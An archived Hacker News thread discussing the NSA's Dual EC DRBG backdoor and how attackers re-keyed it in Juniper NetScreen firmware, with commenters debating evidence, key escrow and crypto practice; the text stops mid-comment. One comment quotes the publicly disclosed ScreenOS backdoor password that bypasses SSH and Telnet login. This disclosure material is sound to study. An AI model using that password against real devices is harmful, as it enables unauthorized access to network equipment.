[HN Gopher] The NSA's Backdoor in Dual EC
       ___________________________________________________________________
        
       The NSA's Backdoor in Dual EC
        
       Author : GordonS
       Score  : 263 points
       Date   : 2021-09-03 13:50 UTC (9 hours ago)
        
 (HTM) web link (twitter.com)
 (TXT) w3m dump (twitter.com)
        
       | COGlory wrote:
       | A bit of a tangent, but why do people insist on posting these
       | things to twitter? They are so annoying to read like that. What
       | does twitter offer that other platforms, designed for this type
       | of content, don't?
        
         | JumpCrisscross wrote:
         | > _What does twitter offer that other platforms don 't?_
         | 
         | Its audience.
        
           | teawrecks wrote:
           | Twitter has made it too annoying to use their site without an
           | account. I'm no longer part of that audience.
        
             | dylan604 wrote:
             | I'm sure Twitter sheds a tear for you and I not being
             | there, but laugh all the way to the bank for the millions
             | that are.
        
             | eli wrote:
             | Nobody goes there any more, it's too crowded
        
         | haswell wrote:
         | > _What does twitter offer that other platforms, designed for
         | this type of content, don 't?_
         | 
         | Wide reach, and ongoing engagement/discussion.
         | 
         | I read threads like this because the follow-on discussion is
         | often just as or more interesting than the thread itself.
         | 
         | I think a blog post is also a good option here, but most blogs
         | aren't well suited for having a discussion.
        
           | matthewdgreen wrote:
           | Here's the blog post I wrote in 2015, if you prefer.
           | https://blog.cryptographyengineering.com/2015/12/22/on-
           | junip...
        
         | user-the-name wrote:
         | Readers.
        
       | JasonFruit wrote:
       | This bit stuck out to me:
       | 
       | > The second lesson is that "serious" people are always inclined
       | away from worst-case predictions. In bridge building and politics
       | you can listen to those people. But computer security is
       | adversarial: the conscious goal of attackers is to bring about
       | worst-case outcomes.
       | 
       | Are they suggesting that bridge-building and politics are _not_
       | adversarial? It seems to me that bridges and politics are weak
       | points that are frequently attacked.
       | 
       | Or am I missing sarcasm?
        
         | Youden wrote:
         | Yes, they're suggesting that bridge building isn't adversarial.
         | 
         | In bridge building you might often ignore questions like "what
         | if that nearby skyscraper fell on the bridge" or "what if there
         | was a 100-year flood every day for a week". They're scenarios
         | that can conceivably happen but they're very unlikely.
         | 
         | In computer security, you wouldn't be so safe because you need
         | to protect your digital bridge from an adversary who has no
         | problems demolishing the nearby figurative skyscraper.
         | 
         | Of course there are real-world situations where bridge building
         | is adversarial, if you're in a war-zone for instance. I think
         | the author is discussing more civil situations like "should we
         | spend an extra $1B to make the bridge asteroid proof".
        
       | bm3719 wrote:
       | https://threadreaderapp.com/thread/1433470109742518273.html
        
         | sundarurfriend wrote:
         | With the new Twitter changes, this should become a HN rule -
         | that the OP should post a threadreader (or equivalent) link in
         | the comments if TFA is a Twitter post.
        
         | cream_n_cream wrote:
         | Thank you
        
         | unnouinceput wrote:
         | thread reader app is missing the addendum.
         | 
         | Quote: "Addendum: the White House Press Secretary was asked
         | about this story, and their answer is "please stop asking about
         | this story." h/t " - https://youtu.be/Hfa6bih_gVc?t=1740
         | 
         | That's f*ing hilarious
        
       | dylan604 wrote:
       | The entire concept of a backdoor that only the good guys have the
       | keys too is so moroinic as to make my blood boil. The TSA locks
       | were picked because a photo of the keys were posted online. The
       | NSA forced an encryption method that they knew how to defeat got
       | pwned. Yet the backdoor method still gets bandied about like it's
       | the one thing to save us when it is exactly what will sink us.
        
         | tzs wrote:
         | > The entire concept of a backdoor that only the good guys have
         | the keys too is so moroinic as to make my blood boil.
         | 
         | Uhm...isn't the whole basis of modern cryptography the idea
         | that you can have keys that only the good guys know? Every time
         | you use an HTTPS site for example you are relying on the
         | existence of keys that only the good guys know. Every time you
         | use an end to end encrypted messaging system you are relying on
         | the existence of keys that only the good guys know.
         | 
         | The issue with backdoors is not keeping keys secret. It is
         | keeping others from also installing backdoors.
        
           | dylan604 wrote:
           | I'm thinking you're not understanding the problem correctly.
           | Backdoors mean that people with that access can read things
           | without having the shared keys. You and I exchange keys so we
           | can communicate privately. Because only you and I have those
           | keys, nobody else can read those messages. However, because
           | the TLAs have backdoor access, you and I and the TLAs can
           | read the messages. However, you and I don't know that or at
           | least we're unaware when it is occurring (because we read
           | things like HN and are at least aware of backdoors). Now, bad
           | actor #1 discovers the backdoor and jimmies the lock, and now
           | they can read our "private" messages. Then bad actor #2 comes
           | along and releases to the public how to use the backdoor on
           | anyone's private messages, and now nothing is private and the
           | crypto is a waste of energy. Then the TLAs come along and
           | make it illegal to distrubte code that allows access to the
           | backdoors and someone releases a new t-shirt.
           | 
           | The rest of the world sits back and says "I told you so".
        
           | asimpletune wrote:
           | > Uhm...isn't the whole basis of modern cryptography the idea
           | that you can have keys that only the good guys know?
           | 
           | No it in any way, but based on your other examples, maybe
           | you're thinking about certificate authorities?
        
         | [deleted]
        
         | khuey wrote:
         | The attackers didn't get the keys to the back door. They
         | actually replaced the entire door with a new door that they
         | made, which went unnoticed (by Juniper) for 3 years, locking
         | out the owners of the original back door too. It's a rather
         | impressive attack.
        
           | marcan_42 wrote:
           | No, the attackers just re-pinned the backdoor lock cylinder
           | that the NSA put on their "secure" door. That's why nobody
           | noticed. The NSA conveniently left them a door with a
           | backdoor they could hijack in a way that is effectively
           | invisible.
           | 
           | Replacing the whole door would've been like replacing the
           | entire DRBG, which would've much more likely raised alarms.
        
             | eli wrote:
             | Having a convenient backdoor already integrated definitely
             | aided the attack, but a sophisticated attacker with the
             | ability to silently modify your codebase is a pretty bad
             | place to start from regardless.
        
               | convolvatron wrote:
               | how would you possibly prevent such a thing? even if
               | Juniper subjected all potential employees to clearance-
               | like screening - that's not foolproof either.
        
           | soraminazuki wrote:
           | From the original link:
           | 
           | > In practice this would simply mean hacking into a major
           | firewall manufacturer's poorly-secured source code
           | repository, changing 32 bytes of data, and then waiting for
           | the windfall when a huge number of VPN connections suddenly
           | became easy to decrypt. And that's what happened. 10/
           | 
           | I would definitely not describe replacing 32 bytes as
           | "replacing an entire door."
        
         | markus_zhang wrote:
         | There is no good/bad guy in this scenario if you model the
         | world in a way such that there are people who have and people
         | who don't.
        
           | dleslie wrote:
           | Sure there is!
           | 
           | There are people who act with malice and sadism, people
           | driven to harm others, people overwhelmed by greed and people
           | consumed by a lust for power. And there are people who devote
           | their lives to aiding others, people who are mindful of their
           | community's needs, people who take opportunities to help
           | others over opportunities to help themselves.
           | 
           | All these sorts can be found across the whole spectrum of
           | wealth.
        
             | [deleted]
        
             | vorpalhex wrote:
             | While I generally agree with your take, it's important to
             | remember that the road to hell is paved with good
             | intentions. Sometimes the most evil actors are those
             | knights who believe they are fighting for some great holy
             | cause.
        
               | bobbytit wrote:
               | Like the Climate religion for instance
        
       | perihelions wrote:
       | I don't understand the significance of the Dual EC
       | vulnerabilities here. The attackers had write access to the
       | target's crypto code, and altered it to their convenience. What
       | cryptosystem is secure against that threat model?
       | 
       | That the "re-keying" edit fits in 32 bytes is a neat math trick,
       | but doesn't seem to me like a central issue. What am I
       | misunderstanding?
       | 
       | > _" In practice this would simply mean hacking into a major
       | firewall manufacturer's poorly-secured source code repository,
       | changing 32 bytes of data, and then waiting for the windfall when
       | a huge number of VPN connections suddenly became easy to decrypt.
       | And that's what happened. 10/"_
        
         | tinus_hn wrote:
         | Now do this without anyone noticing!
        
         | trasz wrote:
         | The central issue was that the algorithm was backdoored in the
         | first place, by NSA.
        
         | yk wrote:
         | It's the kind of hack that survives a security audit. There is
         | no leaked data or anything, it is just that afterwards the
         | crypto works precisely as the standard intended.
        
         | khuey wrote:
         | The implication here is that the "change a 32 byte constant
         | that nobody knows the provenance of to begin with" thing is
         | what allowed this to fly under the radar for 3 years compared
         | to an "if (attacker) { give_root(); }"-style insertion.
        
           | [deleted]
        
         | cryptonector wrote:
         | The way Dual_EC works, to exploit it you need a TLS extension
         | that has the server send "large nonces", which you use along
         | with knowledge of the backdoor key to recover RNG state and so
         | recover the server's Diffie-Hellman keys.
         | 
         | Now, if the backdoor is in place but no one was using it, no
         | one would know if the public backdoor key got changed. But the
         | attacker gets to decrypt all these sessions. OTOH, if NSA was
         | trying to use the backdoor and noticed it wasn't working, they
         | might start looking into it and find the hack.
         | 
         | So being able to make a very small source code change (32 bytes
         | of public key material in this case) that has this impact is
         | fantastic because that change is small enough that no one might
         | have notice for a long time (which is apparently what actually
         | happened).
         | 
         | But you're right, if you can change the source code then you
         | can add a backdoor anyways, so Dual_EC being backdoored is not
         | what was fatal to the Juniper systems. What was fatal to them
         | is that they had poor internal security.
         | 
         | Still, an intentional backdoor _key_ is plausibly -likely even-
         | easier to replace than a backdoor is to add. So this is a
         | decent argument against intentional backdoors. But it 's not
         | really a devastating argument against intentional backdoors.
         | 
         | Intentional backdoors are bad for political reasons too -- or
         | good, maybe, depending on your point of view. Intentional
         | backdoors are bad because the key to the backdoor can leak, and
         | when that happens it can be very hard to fix -- this _is_
         | devastating to security of the backdoored system, so I think it
         | is a devastating argument against intentional backdoors,
         | especially for a backdoor where exploitation is _passive_ ,
         | like Dual_EC.
         | 
         | Dual_EC was a fine covert key escrow system for U.S. government
         | systems, but there was no need to make it covert if it was only
         | for that.
         | 
         | EDIT: But the real problem with Dual_EC is that it's terribly
         | slow. /s
        
       | gzer0 wrote:
       | Searching for the text "strcmp" finds a static string that is
       | referenced in the sub_ED7D94 function. Looking at the strings
       | output, we can see some interesting string references, including
       | auth_admin_ssh_special and auth_admin_internal. Searching for
       | auth_admin_internal finds the sub_13DBEC function. This function
       | has a strcmp call that is not present in the 6.3.0r19b firmware:
       | The argument to the strcmp call is <<< %s(un='%s') = %u, which is
       | the backdoor password, and was presumably chosen so that it would
       | be mistaken for one of the many other debug format strings in the
       | code. This password allows an attacker to bypass authentication
       | through SSH and Telnet.
       | 
       | [1] is the backdoor. [2] is more details regarding discovery.
       | 
       | [1] https://github.com/rapid7/metasploit-
       | framework/blob/master/m...
       | 
       | [2] https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-
       | scr...
        
         | samuel wrote:
         | That's one of them, and the least interesting of both. I
         | remember that the other one was way more concealed and involved
         | a global variable or something like that and it didn't seemed
         | that the code was doing what was actually doing.
         | 
         | There was an amazing blog entry which explained it, but can't
         | find it right now.
         | 
         | Edit: I don't think this was the one I read, but it's similar.
         | https://cryptologie.net/article/316/junipers-backdoor/
         | 
         | Basically, Dual EC was chained to another PRNG, so the output
         | should have been robust to crypto vulnerabilities discovered in
         | any of both. The thing is: the second one was never called,
         | because the for's index(a global variable) was set to 32 inside
         | a function call, so the loop never run.
        
       | inasio wrote:
       | My favourite part is that the NSA acknowledged to Wyden that they
       | had written a lessons learned memo, and when asked to produce it
       | they could never find it...
       | 
       | "In a July 2020 response to Wyden and other members of Congress,
       | Juniper provided few new details of the case but blamed the
       | intrusions on a "sophisticated nation-state hacking unit." NSA
       | told Wyden's staff in 2018 that there was a "lessons learned"
       | report, but the agency "now asserts that it cannot locate this
       | document," according to a Wyden aide. "
        
       | GuB-42 wrote:
       | Do we have some kind of proof about the backdoor?
       | 
       | It has been quite a while since security researchers publish
       | about a potential backdoor in Dual_EC_DRBG, and even without the
       | backdoor, they found it rather weak. It was even before it was a
       | standard.
       | 
       | Then, there is mentions of the NSA intent on backdooring
       | encryption standards, and the surprising push for making that
       | dubious algorithm a standard.
       | 
       | It makes the scenario of a NSA backdoor very likely, but strong
       | suspicion is not a proof, and yet, all these articles make it
       | into a fact, did I miss something or do they jump to conclusions.
       | Not saying they didn't do it, they most likely did, but if I get
       | accused of a crime one day, I hope that the court will be held to
       | higher standards.
       | 
       | And there is many things I don't get about that story.
       | Dual_EC_DRBG was suspicious from day one, I can't imagine an
       | enemy of the US using it except to transmit misinformation, no
       | need for leaks, the very existence of the algorithm is enough. If
       | the story is true (it is a NSA backdoor), then it is really a
       | show of incompetence (like the whole mess with Snowden, really),
       | or maybe part of the plan of a mastermind, I bet on the former.
        
         | mananaysiempre wrote:
         | Depends on what you mean by " _the_ backdoor".
         | 
         | That the generator is undetectably backdoor _able_ through
         | choice of constants has never been in question, from what I
         | understand, and has been known outside the NSA (who designed it
         | and chose the constants) via an explicit construction since
         | before the relevant standard was finalized; it's also so
         | pointlessly slow nobody would normally include it in their own
         | software except maybe out of completionism, which was ANSI's
         | official motivation for including it as well. (Green's 2015
         | blog post[1] has the history and references.)
         | 
         | It's also long been certain that Juniper included that
         | generator in their software with the standard constant, then
         | were hacked and afterwards for several years their software
         | included in that place a _different_ constant, with no other
         | code changes, and finally an official emergency security update
         | rolled that value back. The presence of the generator was not
         | mentioned in the official documentation neither before nor
         | after the hack, and the code gave the appearance of combining
         | its output with that of another generator (which would have
         | eliminated the backdoorability) while in fact not doing so
         | because of something that looks like a logic bug. (I haven't
         | gathered the links on this but the surrounding comments here
         | have most of them I think.)
         | 
         | Now, to me this seems like overhelming evidence that Juniper
         | products have had a crippling security vulnerability due to the
         | known backdoorability of Dual_EC_DRBG, without Juniper wanting
         | it so. There is just no other plausible reason to break into
         | Juniper and out of everything you could changing this one
         | apparently pseudorandom string.
         | 
         | To make an argument against standardizing or using backdoorable
         | cryptographic algorithms (Green's point in the thread under
         | discussion), this is as far as we need to get. The only thing
         | the rest is relevant for is NSA's reputation, government
         | backdoors, and willing participation in them; but the Juniper
         | story already suggests that the distinction between backdoor
         | _able_ and backdoor _ed_ (and broken) is at best academic.
         | 
         | * * *
         | 
         | There is also a second place where Dual_EC_DRBG is known to be
         | implemented, and that is the RSA BSAFE library. This library
         | also includes but in most builds does not enable a weird TLS
         | extension from what came to be known as the Extended Random
         | family, though old and uninteresting Internet-connected devices
         | have been spotted with it enabled. Now, the only thing this
         | extension does--the thing it was described to be _for_ by
         | people bearing a US government badge who presented the
         | Internet-Drafts on the IETF mailing lists--is expose more raw
         | randomness from the system's cryptographic random generator. No
         | cryptographer anywhere has ever (publicly) described or even
         | suggested any way to use this to improve the security of TLS in
         | any configuration, including the authors of the Internet-
         | Drafts. (See Green's 2017 post[2] and links therein for the
         | details.) However, if you are trying to break the system's
         | vulnerable random generator, exposing more of its output is
         | immediately useful.
         | 
         | We are now two for two in commercial vendors of security
         | products who implemented Dual_EC_DRBG also exposing its raw
         | output (thus enabling the exploitation of the backdoor if one
         | is configured through the choice of its constant) through ways
         | that are both unusual and unnecessary for the operation of the
         | product (logic bug for Juniper, completely useless and unused
         | experimental TLS extension for RSA).
         | 
         | That when implementing Dual_EC_DRBG in the first place
         | necessitates an explanation. Random generators are essential in
         | a cryptographic systems, but unlike ciphers and such they are a
         | completely opaque implementation detail--somebody you're
         | communicating with not only mustn't depend on but actually
         | can't distinguish which generator you're using (indeed a
         | generator that can be distinguished is defined to be broken).
         | Thus the choice of generator is a combination of speed (and
         | it's a speed-critical component) ease of implementation and
         | confidence in the cryptograhy. Not only is the cryptograhy in
         | Dual_EC_DRBG dodgy and known to be so--it's a choice of 32 data
         | bytes away from being completely and undetectably broken--it's
         | also hard to implement (elliptic curves in general are Hell on
         | Earth, and while careful choices like in *25519 and *448 can
         | mitigate that somewhat, Dual_EC_DRBG as standardized doesn't
         | have the necessary structure) and most importantly _stupidly
         | slow_. It _might_ make sense for ANSI (or, indeed, the NSA) to
         | include it on the list in case it turns out 20 years later that
         | the assumed-intractable problems underlying every other
         | generator aren't but elliptic curve logarithm still is (this
         | was the official motivation), but as an implementor the one
         | choice you're going to omit absent an external reason is the
         | generator which requires difficult mathematics and is also _two
         | orders of magnitude_ slower. Dual_EC_DRBG is not "suspicious"
         | as a choice of random generator, it's _stupid_.
         | 
         | This, I think, is enough to rule out any non-extraordinary
         | hypotheses on why both Juniper and RSA included Dual_EC_DRBG in
         | their products, and as extraordinary hypotheses go, "NSA paid
         | them to, either directly or by imposing that condition in
         | government contracts, because it did choose a constant enabling
         | the backdoor for the generator it invented" is a pretty good
         | one. It's also corroborated by (otherwise questionable but
         | plausible) reports of the NSA doing just that for Juniper (in
         | the Yahoo Finance / Bloomberg report under discussion here) and
         | RSA (quite some time ago[3], although it never rose above a
         | rumour and RSA PR tried to run some damage control at the
         | time). This also mostly discharges the questions as to why NSA
         | would create and champion a known-backdoorable algorithm for
         | the standard in the first place, all while dodging the constant
         | choice question in the committee discussions (and even if they
         | birthed this monster for some other reason, they could hardly
         | have missed a freaking _patent_ on the technique filed while
         | standardization still was underway).
         | 
         | All in all, this looks like strong enough evidence to overcome
         | the conspiracy-theoretic penalty and leave me reasonably
         | certain the NSA really did both consciously put this into the
         | standards and spend years pushing it into commercial products.
         | 
         | As to the question of the enemies of the US using this, I can
         | offer two points:
         | 
         | - Cryptography is obscure, the infrastructural importance of
         | computer systems is widely underestimated, and government (or
         | corporate, or diplomatic, or any large organization's)
         | bureaucracy everywhere is pathologically incapable of staying
         | on top of important details. Nobody ever got fired for buying
         | Juniper firewalls or licensing RSA libraries; it's the
         | respectable, enterprisey thing to do. (Furthermore, not that
         | many reputable companies make VPN appliances at all; for all we
         | know Cisco weren't any smarter.)
         | 
         | - National security, intelligence and counterintelligence,
         | state security, secret police, however your place and time of
         | birth call them, have been thoroughly rotten for as long as
         | they have existed, maybe longer. The crossover Crusader / Big
         | Data mentality, "surveil everyone and let God sort then out",
         | has always been the default. (As well as the old Soviet adage,
         | "give me the man and I'll find you the charge", although in
         | more civilized places one is hopefully forced to use blackmail
         | and not the legal system.) There don't need to _be_ any real
         | enemies of the US (or wherever) in the chosen direction as long
         | as your salary or purpose in life depends on finding them; and,
         | to be fair, it's not as if the US doesn't have plenty of
         | enemies within or without.
         | 
         | And that's a damn shame, because the problem of national
         | security (to use modernity's chosen term) is not imaginary;
         | it's just that the solution, even given sincere and well-
         | meaning people as input, always comes out sick.
         | 
         | Finally, regarding suspicion and proof, I don't really see the
         | distinction you're trying to make. If "strong suspicion" is to
         | be understood as "weak but not negligible evidence one is
         | struggling to formalize the reasoning for", I disagree that's
         | what we have; if instead it means "strong but circumstantial
         | evidence", I agree, but the boundary between that and "proof"
         | is largely nonexistent, especially in a situation such as this.
         | Unless yet another good person self-immolates specifically to
         | expose the nature of this particular trick in the NSA's
         | enormous bag, this as strong as support for this hypothesis is
         | going to be, so demanding "proof" as opposed to the current
         | "strong suspicion" seems epistemically counterproductive to me.
         | There's been enough fire for few enough results that I can't in
         | good conscience advocate anyone inflict more on themselves;
         | this particular bit of trivia by itself also seems not worth
         | giving up one's life over.
         | 
         | (Snowden's factual contribution to this specific story has been
         | vague enough that it's not particularly worth mentioning--
         | something something working with and/or to compromise vendors,
         | something something breaking "most encryption on the Internet"
         | --except maybe for drawing people's attention to the points
         | above, all of which are from other and frequently earlier
         | sources. "Lent credence" is right.)
         | 
         | * * *
         | 
         | What part of the "mess with Snowden" do you count as
         | incompetence? The exfiltration approach he describes in his
         | book does sound like run-of-the-mill incompetence if taken at
         | face value, but that's hardly the part that people were (and, I
         | hope, still are) miffed about.
         | 
         | [1]
         | https://blog.cryptographyengineering.com/2015/01/14/hopefull...
         | 
         | [2] https://blog.cryptographyengineering.com/2017/12/19/the-
         | stra...
         | 
         | [3] https://www.cnet.com/tech/services-and-software/security-
         | fir...
        
       | Y_Y wrote:
       | > the field is called computer security; not computer optimism
       | 
       | I'd like to go even further and propose the following terms:
       | * computer wishful thinking       * security by credulity       *
       | zero-skepticism proof
        
         | krylon wrote:
         | "zero-skepticism proof" is an amazing name. Don't mind if I
         | borrow that from time to time. ;-)
        
           | reaperducer wrote:
           | That's the name of my Rage Against the Machine tribute band.
        
         | not2b wrote:
         | The NSA actually had their own term for this, NOBUS, which
         | meant "nobody but us". They were fond of attacks that they
         | thought nobody but the NSA could exploit. They were arrogant
         | enough to think they were better than all adversaries.
        
           | Gibbon1 wrote:
           | That's insane when the Chinese are playing the game too.
        
           | a1369209993 wrote:
           | Nitpick: the acronym is actually "No _One_ But US ", IIRC.
        
           | sigg3 wrote:
           | What do you mean "were"..?
        
             | harry8 wrote:
             | They're probably not dumb enough to think that they're so
             | much better than their adversaries that they can do this
             | stuff and it's fine anymore given how badly they've just
             | been exposed in public.
             | 
             | Not saying that will change behaviour but it's hard even
             | for the massively delusional to continue to really believe
             | they can walk on water when they find themselves under it.
        
         | sneak wrote:
         | I have read that "hope is not a strategy" is a common aphorism
         | amongst SREs at Google.
        
         | markus_zhang wrote:
         | security by certification
        
       | You-Are-Right wrote:
       | Serious joke question: do exist commercial firewalls without
       | backdoors? Please put evidence in answer, thanks!
        
       | bob1029 wrote:
       | Calling out the cryptographic community on this has always
       | resulted in becoming tarred & feathered in my experience. "How
       | _dare_ you question these experts? You are _not_ a cryptographer.
       | "
       | 
       | No, I am not. But, I understand information theory and people. I
       | don't need an ivory tower credential to call out potential
       | bullshit or leverage my own intuition.
       | 
       | This kind of nonsense also makes me wonder how many of those
       | "dont roll your own crypto" people are intentionally pushing
       | developers towards these state-sponsored libraries & methods.
        
         | not2b wrote:
         | But the cryptographic community was RIGHT on this, with at
         | least six papers from respected researchers raising concerns
         | back around 2007. It was businesses (like RSA and Juniper) that
         | overrode these concerns under pressure.
        
         | ackbar03 wrote:
         | Then you my friend are free to roll your own crypto
        
           | bob1029 wrote:
           | Just so we are clear, rolling my own crypto doesnt
           | necessarily involve reinventing SHA256 and AES from scratch.
           | 
           | It just means using these primitives directly rather than
           | farming out and allowing others to select the underlying
           | methods for you.
           | 
           | I use Microsoft's cryptographic implementations, but I don't
           | let them pick the method for me. I don't think this is
           | unreasonable if you have some experience in the space.
        
             | marcus_holmes wrote:
             | It's that old saw of "anyone can create a security system
             | that they can't break". How do you _know_ that your
             | combination of methods is secure?
             | 
             | There may well be hidden (or at least non-obvious)
             | complications with using certain methods and/or
             | implementations together that make them easier to break. If
             | you're not aware of that, but someone else is, then the
             | first you'll know about it is years later when a security
             | leak is traced back to your "secure" system. And the only
             | other way of knowing about this sort of stuff is to spend a
             | lot of time staying current with the research.
             | 
             | Or you can let someone else do all that hard work, and run
             | the extremely small risk that their work has been silently
             | compromised by the NSA (or other state actor of your
             | choice).
        
               | a1369209993 wrote:
               | > How do you know that your combination of methods is
               | secure?
               | 
               | Because if you give me some hashes, some messages, and a
               | black box that signs arbitrary things for a arbitrary
               | public key (with my combination of methods), I can turn
               | around and give you back either a preimage of one of the
               | hashes or a second preimage of one of messages. Provable
               | security is nice.
               | 
               | Still working on how to extend such a scheme to key
               | agreement rather than just signing, admittedly.
        
             | marcan_42 wrote:
             | Putting together primitives in a way that doesn't have
             | subtle flaws is not trivial. Many a standard have been
             | vulnerable due to this. You think you can do better?
             | 
             | We _do_ have simple, well engineered, and sometimes even
             | probably secure constructions. Look at libsodium if you
             | want a decent example of what a modern library looks like.
             | 
             | And stay away from anything that mentions the words NIST,
             | FIPS, or any other government acronym. You aren't going to
             | find modern, well-engineered, simple crypto in anything
             | catering to that market. It's always hideously
             | overcomplicated and rife with chances for bugs.
        
               | dylan604 wrote:
               | >and sometimes even probably secure constructions
               | 
               | Probably doesn't make me feel secure. Did you mean
               | properly?
        
               | marcan_42 wrote:
               | Sorry, that was a typo, I meant _provably_. As in
               | constructions that have been proven to be secure assuming
               | the underlying primitives are secure.
        
               | dylan604 wrote:
               | I like provably better than properly. Now I feel warm and
               | fuzzy.
        
           | troyvit wrote:
           | Not that I sanction all of the parent's post, but for
           | instance Telegram did exactly that, and they still receive
           | grief for rolling their own crypto. So per the parent you can
           | either use back-doored state-sponsored encryption or roll
           | your own which nobody trusts. Which is better? Is there
           | another alternative?
        
             | marcan_42 wrote:
             | State sponsorship doesn't matter, what matters is that it's
             | secure. Everyone knew Dual-EC DRBG was likely backdoored,
             | it stank to hell and back. There are dozens of other
             | CSPRNGs, including other "state sponsored" ones, that
             | pretty clearly aren't. There is also a whole world of
             | crypto developed by people not associated with any state,
             | including the modern ec25519/ChaCha based combinations
             | (which are partly a response to the idea that the widely
             | used NSA proposed ECC parameters may also be backdoored).
             | 
             | There are trustable people doing things right with easy to
             | use libraries you can just drop in today, with documented
             | rationale for the designs and without any "magic numbers"
             | (which are a telltale of the backdoored and suspected-
             | backdoored NSA algorithms).
        
       | markus_zhang wrote:
       | > Members of a hacking group linked to the Chinese government
       | called APT 5 hijacked the NSA algorithm in 2012, according to two
       | people involved with Juniper's investigation and an internal
       | document detailing its findings that Bloomberg reviewed. The
       | hackers altered the algorithm so they could decipher encrypted
       | data flowing through the virtual private network connections
       | created by NetScreen devices. They returned in 2014 and added a
       | separate backdoor that allowed them to directly access NetScreen
       | products, according to the people and the document.
       | 
       | Can we have more technical details regarding this? I guess some
       | heavy math (number theory) is involved here but really intrigued
       | how it was developed.
        
         | Arkanum wrote:
         | Computerphile[1] did a video about the specifics of the
         | backdoor in Dual EC DRBG.
         | 
         | As i understand it, the hackers replaced a magic number Q with
         | a different value than the standards compliant one, where they
         | had pre-computed P.
         | 
         | [1]:https://www.youtube.com/watch?v=nybVFJVXbww
        
         | khuey wrote:
         | APT 5 hacked into Juniper and replaced an input parameter to
         | the Dual EC PRNG that was backdoored by the NSA with one that
         | was backdoored by them.
         | 
         | https://dl.acm.org/doi/pdf/10.1145/3266291 goes into it in some
         | detail
        
       | tgbugs wrote:
       | Huh. I had not though of the rekeying issues before. Glaringly
       | obvious in hindsight. The question of "how can you ensure that
       | this system will not be rekeyed to respond to someone else" is a
       | great one. The best answer is "there is nothing that can be
       | rekeyed."
        
       | jokoon wrote:
       | The amount of brain power that the NSA is using is staggering, it
       | is not surprising they have such upper hand on cryptography.
       | 
       | I've heard the NSA is one of the biggest employer of math people.
       | 
       | At that point, I'm guessing some form of obscurity might somehow
       | be a better idea to protect data from the NSA, or at least it
       | would force NSA employees to analyze some obfuscated data, buying
       | more time than just using mainstream methods.
       | 
       | In the end, I don't think nobody has good enough reason to hide
       | stuff from the US government, at least that's my opinion, as long
       | as the US gov is not too evil or not too corrupt. As long as
       | other dangerous governments or criminals can't do too much cyber
       | damage, things are fine.
       | 
       | I'm still curious if ML can create new kinds of cryptography.
       | 
       | Maybe a time will come where China/Russia will have enough
       | expertise to break good enough crypto, and then the cyber
       | battlefield will really change.
        
         | tsimionescu wrote:
         | > In the end, I don't think nobody has good enough reason to
         | hide stuff from the US government, at least that's my opinion,
         | as long as the US gov is not too evil or not too corrupt. As
         | long as other dangerous governments or criminals can't do too
         | much cyber damage, things are fine.
         | 
         | Such a bizarre take. The US government is one of the most
         | belligerent and feared governments in the world, with a known
         | track record of starting wars, toppling democratic governements
         | that are opposed to them, ignoring international law,
         | prioritizing US corporations over any local peoples. China and
         | Russia aren't even half as scary to the vast majority of the
         | planet.
        
           | phendrenad2 wrote:
           | Most people have NOT had a war started on them by the US
           | government, so the take makes sense.
        
         | marcan_42 wrote:
         | This has nothing to do with brain power. This was a
         | deliberately backdoored algorithm that any cryptographer
         | familiar with elliptic curve cryptography could've come up
         | with. It wasn't even good or clever, seeing as people saw
         | through it almost immediately. The only thing it had going for
         | it is it was plausibly deniable and that allowed the US
         | government to force people to implement it, since nobody could
         | prove the NSA really had the secret keys.
         | 
         | Stuff like this is, on the contrary, evidence that the NSA _can
         | 't_ break modern cryptography. If they could, they wouldn't
         | need to try to push through blatant backdoors like this.
         | 
         | If you want to be safe from the NSA, use well-vetted, simple,
         | auditable cryptography tools. The NSA doesn't break real crypto
         | any more, they just find or make software bugs.
         | 
         | The only "thing the NSA has probably broken" that comes to mind
         | in the modern crypto world is when people realized that you
         | could do a one time mass computation for fixed parameters for
         | n-bit Diffie-Hellman and then use the result to decrypt any
         | communications that that used them, efficiently... which was a
         | bit of a problem when tons of software around the world was
         | using default parameters, often 1024-bit, which is in "the NSA
         | can almost certainly break it" range. I remember when that
         | happened, I went through all my servers and re-generated my own
         | dh parameters for OpenSSL, at 4096 bits. But this wasn't a
         | particularly mind blowing idea, it was more like an "oh shit"
         | moment since everyone knew the NSA had the storage/compute
         | budget to actually carry out this attack. But anyone serious
         | about crypto shouldn't have been using 1024-bit DH anyway; it
         | was just a failure of the ecosystem that nobody had proactively
         | deprecated such small sizes.
        
           | sjaak wrote:
           | > Stuff like this is, on the contrary, evidence that the NSA
           | can't break modern cryptography.
           | 
           | Unless they're one step ahead here and they _want us to think
           | that_ which is why they add backdoors knowing that years
           | later that knowledge will become public, giving us all a
           | reason to think they cannot break modern crypto.
           | 
           | <takes off his tinfoil hat>
        
             | dylan604 wrote:
             | or taking the false flag further to be able to say that all
             | crypto is weak and has flaws, so mights as well forgoe it.
             | sure would make everyone's job easier.
        
             | atatatat wrote:
             | Tinfoil acts as a receiver...
        
           | sangnoir wrote:
           | > The NSA doesn't break real crypto any more, they just find
           | or make software bugs.
           | 
           | They still can, and do break crypto. The Snowden papers
           | (IIRC) mentioned that NSA factored a bunch of primes by
           | throwing ridiculous amounts of compute at it: billions of
           | dollars.
           | 
           | With that,they could break schemes with no forward secrecy at
           | their leisure (from all the historical internet traffic they
           | had gathered), and they could decrypt ~30% of all "secure"
           | internet connections _in real time_ at the time,IIRC
        
             | sroussey wrote:
             | And vulnerabilities are constantly discovered, so they can
             | go back to the recorded internet and break it.
        
             | Y_Y wrote:
             | That's easy when you know the secret. Give me any prime, as
             | big as you like, and I'll factor it for you right now.
        
             | marcan_42 wrote:
             | You're describing the Diffie-Hellman story I mentioned (in
             | a somewhat confusing way; forward secrecy isn't involved
             | here, this isn't about breaking RSA TLS keys, and in fact
             | DH is used in connections _with_ forward secrecy). Again,
             | that only works for 1024 bit DH schemes. The NSA can 't
             | factor 2048 bit keys, and they _definitely_ can 't factor
             | 4096 bit keys. These aren't unknown capabilities; it's
             | pretty easy to get an order of magnitude estimate on how
             | much compute power the NSA has (spoiler alert: Google has
             | more).
        
         | dylan604 wrote:
         | >I've heard the NSA is one of the biggest employer of math
         | people.
         | 
         | What are the other options for pure maths people? Academia?
         | Does that really pay any better, plus, depending on your
         | teaching level, there's a good chance you're just a babysitter.
         | A cush gov't job probably sounds pretty good where you will
         | actively be using your skills on a daily basis.
         | 
         | Are there FAANG opportunties for math people at the same level
         | as gov't?
        
           | Y_Y wrote:
           | Finance is a good one. Academia is really hard to make any
